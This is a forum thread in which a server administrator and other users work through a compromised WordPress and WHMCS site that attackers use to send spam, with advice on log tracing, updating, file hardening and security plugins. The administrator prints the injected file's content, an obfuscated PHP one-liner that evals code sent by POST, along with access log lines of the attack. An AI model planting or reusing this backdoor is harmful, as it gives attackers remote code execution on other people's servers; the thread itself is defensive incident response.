New on LowEndTalk? Please Register and read our Community Rules.
All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.
All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.
PHP injection
Hi, I have one cPanel server with NginX + Apache where there are some Wordpress sites, but there's one that has a lot of injections in with.
Web users are abble to create a php file and with POST then inject thousants of emails using local account.
I've added some extra security and tried it all, but I can't get it.
Any tip about this ?
Thanks.
Comments
pro tip: don't use wordpress.
Track the POST requests in the logs to find out what plugin/theme file they are exploiting and kill it.
copy content, remove cPanel account (yes, REMOVE), recreate the site making sure nothing you add (like themes) has a backdoor, done
A little more information, this are the logs where injection is done:
137.175.118.113 - - [27/Apr/2015:10:49:41 -0300] "POST /panel/modules/gateways/title.php HTTP/1.0" 200 412 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
This inside a WHMCS, but it's latest version and autoupdated. Here is when user could write the PHP file.
137.175.118.113 - - [27/Apr/2015:10:49:42 -0300] "GET /wp-content/plugins/gravityforms/languages/system.php HTTP/1.1" 200 47 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
Verification that file is there .....
And then a lot of POST entries with one nice email per post:
202.124.242.10 - - [27/Apr/2015:11:01:57 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 1881 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
202.124.242.10 - - [27/Apr/2015:11:02:07 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
202.124.242.10 - - [27/Apr/2015:11:02:24 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 219 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
202.124.242.10 - - [27/Apr/2015:11:02:37 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 849 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
202.124.242.10 - - [27/Apr/2015:11:02:56 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 2037 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
202.124.242.10 - - [27/Apr/2015:11:03:08 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 2283 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
Those are likely POST requests to files that were changed or added by the malicious visitor/bot. Track them back in the logs, using IPs, file names, and "POST" to grep things out until you find where it began and what the initial file was. However, keep in mind that logins may be relevant as well as they will also brute force, edit a theme file, and then execute it.
It may help you narrow down the time frame by looking at the modify time on the files, just run "stat [filename]" to grab modify times. Keep in mind that it may be a game of this file made that file which made that file, so you may need to go a ways back.
This is the correct way. But if you forget a file or to fix the original problem, you'll be in the same situation as you are right now. That's why I recommended you to start over again.
There is no "system.php" in gravity forms plugin in the language dir.
http://plugins.svn.wordpress.org/gravity-forms-sticky-list/tags/1.2.12/languages/
Most probably it's the backdoor, where users are able to inject files... But you have to find out from where it came
go to your log files dir and try, see if you can figure out from where it was created:
grep -r "system.php" .
Disable php execution for such upload directories. Simple to config in nginx, standard setup if you follow the wp hardening instructions. For instance (nginx site config)
block China until you figure out a permanent solution
Normally happens when people don't pay for there themes.
He will just get hacked from another part of the world. Or from China, though a proxy.
Would also recommend to start over.
You're forgetting that a lot of these attack happen on huge scale, odds are the attacker doesn't care to spend switching proxies, just to get 1 attack back up running...
I didn't forget. It's just that that specific chinese attacker is for sure not the only one who can attack this bug - or this backdoor (anyone can exploit most of them).
Right now it is the only attack, if you read my post again, it was to temporarily get this attacker of his back, to buy time to fix things.
@funyuns_are_awesome then it will for sure buy time, but OP can not assume he's safe, he still has a backdoor installed
In all of these that I've dealt with, the attacker is only half of the battle as well. Multiple IPs per hour would come in and execute the scripts, from all types of locations. Usually whoever actually caused it, that IP wouldn't be seen again after 24 hours. Working with sometimes up to 30 or so of these events a day at the previous job, the patterns became pretty noticeable.
start over2late
@Hybrid That is because it has been added using a backdoor. https://wordpress.org/news/2015/04/wordpress-4-2-1/
Remove the system.php file and update Wordpress, you should be fine after that.
Hi, I think that the start of the PHP injection is there, creation of the file:
This is the content of file title.php:
<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q6fc9cb'])){eval(${$s20}['q6fc9cb']);}?>
Rechecking the logs I saw a POST like this:
137.175.118.113 - - [27/Apr/2015:10:49:41 -0300] "POST /panel/modules/gateways/title.php HTTP/1.0" 200 412 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
After this IP created that file and sent this POST:
137.175.118.113 - - [27/Apr/2015:10:49:42 -0300] "GET /wp-content/plugins/gravityforms/languages/system.php HTTP/1.1" 200 47 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
Then I didn't see that IP anymore, but a lot of POSTs started to originate from multiple IPs.
Before that "title.php" I don't know what else to check.
Of course, when I see the attack, I inmediatelly move the injected PHP file and keep checking logs and confirming that all is back to normal after see a lot of 404 errors in apache logs.
@cassa yes, was the latest version with that vulnerability issue, I just manually upgraded to 4.2.1. I really hope this is the problem.
This has been happening about once or twice times per week for the last 5 weeks, I couldn't find a definitive solution to this.
I could see always the injection and the attack, the posts ... but never the source of the problem.
@Jar thanks for the tips, very helpfull !
@Traffic that site is full of installs and plugins, if I can avoid that, I will. But if I still don't fix this, I'll have to do that as my latest option.
@Linkking I would never use a patched or nulled theme / script. I know they're full of backdoors
@Hybrid I guess I found when and where it was injected, but still don't know the source of the problem.
@u137 it's bot a typical upload php file, I can't block access to PHPs, entire site would stop working. Also affortunatelly it's a cPanel VPS !
@funyuns_are_awesome yes, local language of the browsers are chinese, but attack IPs (using POST) are coming from all around the worls, most of them in the USA.
Is that a WHMCS install by chance, where that title.php was? Just the folder structure makes me think of that.
It's a WordPress site installed in root / and WHMCS installed in /panel.
But as I can remember, this is aleatory, I mean that other hacks weren't located inside /panel directory. Not sure right now, but I think so.
Hmm. Something put that there in the WHMCS folder then. I suppose that's as far back as you found grepping the logs for "title.php" though. This isn't a guarantee, but may find some encoded PHP files if any were missed:
http://www.gregfreeman.org/2013/how-to-tell-if-your-php-site-has-been-compromised/
(Codes didn't paste well, the stuff in that article is good though, but may also find legit files)
Sorry to make you work more! That uneasy feeling, it feels irresponsible not to say it
I just sent you a PM now abt this ... hehehe.
Also the link u're suggesting is compromised ! My local antivirus won't allow me to access there ! LOL
http://snag.gy/IuKoS.jpg
Older Gravity forms plugin has issues. See https://blog.sucuri.net/2015/02/malware-cleanup-to-arbitrary-file-upload-in-gravity-forms.html
Do you use mod_sec for Apache? If not, you should.
Add this to wp-content/uploads/.htaccess (remove the spaces on the "Files" entry.
wp-content/.htaccess
Deny access to wp-config.php file. Add this to the root of the web server: .htaccess
mod_Sec : Example of blocking links that contain _input__test.php or _input__test.php5
mod_Sec : Blocking wp-config.php on links
@hdpixel, thanks for this useful information, I already updated the .htaccess files in every directory.
My frontend is NginX, so I don't think mod_sec would work.
Cheers !
Try install wordfence in wordpress.
wordfence been there since the begginning
Sometimes I see this in the log:
109.236.88.29 - - [28/Apr/2015:09:12:38 -0300] "GET / HTTP/1.0" 200 60960 "-" "ANTIPIDERSIA"
Sounds like "The bad guy" taking a look
With wordfence, find out what's files changed.